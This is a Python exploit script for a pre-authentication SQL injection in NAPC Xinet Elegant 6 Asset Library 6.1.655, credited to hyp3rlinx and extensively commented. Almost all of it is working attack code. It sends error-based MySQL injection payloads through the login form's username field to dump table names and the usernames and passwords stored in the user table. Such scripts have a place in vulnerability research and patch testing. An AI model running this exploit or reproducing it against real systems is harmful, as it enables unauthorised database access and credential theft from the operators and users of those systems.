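# Exploit Title: Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
# Exploit author: hyp3rlinx
import argparse
import re
import sys
import time

import requests

# NAPC Xinet Elegant 6 Asset Library v6.1.655
# Pre-Auth SQL Injection 0day Exploit
# By hyp3rlinx
# ApparitionSec
# UPDATED: Jan 2024 for python3
# TODO: add SSL support (every request below is plain http://)
# ===============================
# This will dump tables, usernames and passwords in vulnerable versions
# REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0
# SQL INJECTION VULN PARAM --> LoginForm[username]
#
# Technique: error-based extraction.  Each payload provokes a MySQL
# "Duplicate entry '<value>' for key ..." error through the floor(rand(0)*2)
# GROUP BY trick, and the application echoes the database error (the
# CDbCommand exception text) back in the login response.  One value comes
# back per request: one request per table name, two per user row.
# NOTE: only run this against systems you are explicitly authorized to test.
# ================================================
IP = ""
PORT = "80"
URL = ""
NUM_INJECTS = 20
# Per-request HTTP timeout in seconds; without one a stalled target hangs the
# whole dump forever.
TIMEOUT = 10
j = 0                    # LIMIT offset counter for the table dump (see inc())
TABLES = False
CREDS = False
SHOW_SQL_ERROR = False

# Version string as it appears in the login page; the check is an exact match
# on 6.1.655, so any other build is reported as not vulnerable.
VERSION_RE = re.compile(r'\bElegant",appVersion:"6.1.655\b')


def _login_url():
    """Build the login endpoint from the IP/PORT globals (plain HTTP only)."""
    return "http://" + IP + ":" + PORT + "/elegant6/login"


def vuln_ver_chk():
    """Fetch the login page and report whether it advertises version 6.1.655.

    Returns True when the vulnerable version string is present, False when
    the version differs or the target cannot be reached (a connection
    failure is reported instead of raising, so the caller can bail out).
    """
    global IP, PORT
    target = _login_url()
    try:
        response = requests.get(target, timeout=TIMEOUT)
    except requests.RequestException as exc:
        print("[!] Could not reach " + target + ": " + str(exc))
        return False
    body = response.content.decode('utf-8', errors='replace')
    if VERSION_RE.search(body):
        print("[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655.")
        return True
    print("[!] Version not vulnerable :(")
    return False


def sql_inject_request(SQL):
    """POST the login form with ``SQL`` in LoginForm[username].

    Returns the leaked database error as bytes, from the 'CDbCommand' marker
    through the "for key" fragment, or b"" when the response carries no such
    error (the original sliced from index -1 in that case and returned
    garbage).  Network errors propagate to the caller.
    """
    global IP, PORT
    headers = {'User-Agent': 'Mozilla/5.0'}
    payload = {
        'LoginForm[password]': '1',
        'LoginForm[rememberMe]': '0',
        'LoginForm[username]': SQL,
    }
    res = requests.post(_login_url(), headers=headers, data=payload, timeout=TIMEOUT)
    # Decode once and slice the decoded text: character offsets do not map
    # onto byte offsets when the page contains non-ASCII text.
    text = res.content.decode('utf-8', errors='replace')
    start = text.find('CDbCommand')  # Start of SQL Injection Error in response
    if start == -1:
        return b""
    end = text.find('key 1', start)  # End of SQL Injection Error in response
    if end == -1:
        # Newer MySQL builds quote the key name ("for key 'group_key'") and
        # never emit "key 1"; fall back to the generic fragment so the
        # closing quote of the entry is still inside the slice.
        end = text.find('for key', start)
    if end == -1:
        return b""
    return text[start:end + 3].encode('utf-8')


def inc():
    """Return the next ``offset,count`` pair for the table dump's LIMIT clause.

    Offsets start at 0 so the first table of the schema is included (the
    original started at offset 1 and silently skipped it).  Advances the
    module-level counter ``j``; returns None once NUM_INJECTS pairs have been
    handed out, matching the original's fall-through behaviour.
    """
    global j
    if j >= NUM_INJECTS:
        return None
    pair = str(j) + ',1'
    j += 1
    return pair


def tidy_up(results):
    """Reduce a leaked error (bytes) to the injected value.

    The value sits between the quotes of MySQL's "Duplicate entry '...' for
    key" message.  For credential dumps the leading '+' marker (0x2b in the
    payload) is dropped; for table dumps the trailing ':<digit>' added by the
    0x3a,floor(rand(0)*2) suffix is dropped.  Returns None when no quoted
    value is present, which callers treat as "nothing extracted".
    """
    start = results.find(b"'")
    if start == -1:
        return None
    end = results.rfind(b"'")
    if CREDS:
        return results[start + 2:end]
    return results[start + 1:end - 2]


def _extract(SQL):
    """Run one injection and return its printable text ("" when nothing came back).

    Honors SHOW_SQL_ERROR: the raw leaked error (newline-terminated) versus the
    cleaned value.  The original concatenated bytes with "\\n" in the raw
    path, which raises TypeError on Python 3, so ``-s`` never worked.
    """
    raw = sql_inject_request(SQL)
    if not SHOW_SQL_ERROR:
        raw = tidy_up(raw)
    if not raw:
        return ""
    text = raw.decode('utf-8', errors='replace')
    return text + "\n" if SHOW_SQL_ERROR else text


def breach(i):
    """Run the i-th dump step.

    With CREDS set, row ``i`` of the ``user`` table is extracted with one
    request for the username and one for the password.  (The original chose
    the column by the parity of ``i``, so it returned the username of even
    rows and the password of odd rows and never both for the same row,
    contradicting the "first N rows of usernames and passwords" usage text.)

    With TABLES set, the first call walks the table names of the current
    schema until NUM_INJECTS have been fetched; later calls are no-ops for
    tables because the shared counter ``j`` is already exhausted.
    """
    global j, NUM_INJECTS, SHOW_SQL_ERROR
    # Dump Usernames & Passwords
    if CREDS:
        for target in ('username', 'password'):
            SQL = ('"and (select 1 from(select count(*),concat((select(select concat(0x2b,' + target + '))'
                   'from user limit ' + str(i) + ', 1),floor(rand(0)*2))x from user group by x)a)-- -')
            result = _extract(SQL)
            if result:
                print("[+] Dumping " + target + " (row " + str(i) + "): " + result)
            else:
                print("[-] No " + target + " returned for row " + str(i))
    # Dump Tables
    if TABLES:
        while j < NUM_INJECTS:
            nums = inc()
            SQL = ('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
                   'limit ' + nums + '),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')
            result = _extract(SQL)
            if result:
                print("[+] Dumping Table... " + result)
            time.sleep(0.3)  # pace the requests


def parse_args():
    """Build the CLI parser and return the parsed namespace.

    Flags that take ``nargs="?"`` with ``const="1"`` are truthy whether or not
    a value is supplied; main() treats them as booleans, except -m which it
    converts with int().
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ip_address", help="<TARGET-IP>.")
    parser.add_argument("-p", "--port", help="Port, Default is 80")
    parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
    parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
    parser.add_argument("-m", "--max_injects", nargs="?", const="1",
                        help="Max SQL Injection Attempts, Default is 20.")
    parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1",
                        help="Display SQL Errors, Default is Clean Dumps.")
    parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.")
    return parser.parse_args()


def usage():
    """Print example invocations and exit with status 0."""
    print("Dump first ten rows of usernames and passwords")
    print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -c -m 10\n")
    print("\nDump first five rows of database tables and show SQL errors")
    print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -t -m 5 -s\n")
    # The original example read "-i <TARGET-IP>-p80", which argparse would
    # take as part of the IP value.
    print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -p 80 -t -c -m 30\n")
    sys.exit(0)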
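def main(args):
    """Apply the parsed CLI options to the module globals, confirm the target
    version, then drive the dump loop.

    ``args`` is the namespace returned by parse_args().  Exits with status 1
    when no target IP was given (the original built "http://:80/..." and
    crashed inside requests) and returns early when the version check fails
    or nothing was selected to dump.
    """
    # PORT was missing from this list in the original, so ``-p`` bound a local
    # and every request still went to port 80.
    global TABLES, CREDS, URL, IP, PORT, NUM_INJECTS, SHOW_SQL_ERROR
    if args.ip_address:
        IP = args.ip_address
    if args.port:
        PORT = args.port
    if args.get_tables:
        TABLES = True
    if args.creds:
        CREDS = True
    if args.max_injects:
        NUM_INJECTS = int(args.max_injects)
    if args.show_sql_errors:
        SHOW_SQL_ERROR = True
    if args.examples:
        usage()
    if not IP:
        print("[!] A target is required: -i <TARGET-IP>")
        sys.exit(1)
    if not vuln_ver_chk():
        return
    if not (TABLES or CREDS):
        # Nothing selected: the version check above was the whole job, so do
        # not spin through NUM_INJECTS idle sleeps.
        print("[!] Nothing to dump; pass -t (tables) and/or -c (credentials).")
        return
    for i in range(0, NUM_INJECTS):
        breach(i)
        time.sleep(0.3)  # pace the requests


if __name__ == '__main__':
    print("NAPC Elegant 6 Asset Library v6.1.655")
    print("Pre-Authorization SQL Injection 0day Exploit")
    print("Discovery / eXploit By hyp3rlinx")
    print("ApparitionSec\n")
    time.sleep(0.5)
    if len(sys.argv) == 1:
        # The original printed the help of a fresh, option-less ArgumentParser,
        # which listed nothing but -h; the worked examples are what a user needs.
        usage()
    main(parse_args())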